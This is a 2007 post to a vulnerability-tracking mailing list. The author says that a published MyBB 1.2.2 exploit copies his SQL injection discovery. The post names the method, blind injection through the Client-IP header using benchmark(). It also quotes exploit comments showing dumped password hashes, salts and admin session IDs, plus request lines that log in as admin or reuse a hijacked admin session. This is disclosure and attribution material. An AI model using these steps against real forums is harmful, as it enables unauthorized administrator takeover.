[VIM] Milw0rm 3719 (Mybb <= 1.2.2)

GM darkfig gmdarkfig at gmail.com
Thu Apr 12 17:25:16 UTC 2007


The guy use the same vulnerability I found
(http://acid-root.new.fr/poc/28070403.txt).
He use the same method (benchmark(), Client-IP, DELETE from
prefix_sessions WHERE ip='[SQL]', and a debug mod like me :) ). It's
just the perl version. He use the solution number 1 I said in my
exploit:

# SOLUTION NUMBER 1
# mysql> select * from mybb_users\G
# *************************** 1. row ***************************
#              uid: 1
#         username: root
#         password: 39ac8681f5cf4fcd9c9c09719a618bd3
#             salt: BFeJBOCF
#         loginkey: VYLJia9InmLgM1PT6v2whyMbaoSuprngLnkW55j3zlywItyZBA...
#
# $xpl->post($url.'admin/index.php','username=root&password=toor&do=login&goto=');
# print $xpl->getcontent(); // ...Welcome to the MyBB Administration
Control Panel...
#
# SOLUTION NUMBER 2
# mysql> select * from mybb_adminsessions\G
# *************************** 1. row ***************************
#        sid: 81e267263b9254f3aaf670383bfbfec9
#        uid: 1
#   loginkey: VYLJia9InmLgM1PT6v2whyMbaoSuprngLnkW55j3zlywItyZBA
#         ip: 127.0.0.1
#   dateline: 1175443967
# lastactive: 1175444369
#
# $xpl->addheader('Client-IP','127.0.0.1');
# $xpl->get($url.'admin/index.php?adminsid=81e267263b9254f3aaf670383bfbfec9');
# print $xpl->getcontent(); // ...Welcome to the MyBB Administration
Control Panel...
#
# I decided to use the solution number 2.


More information about the VIM mailing list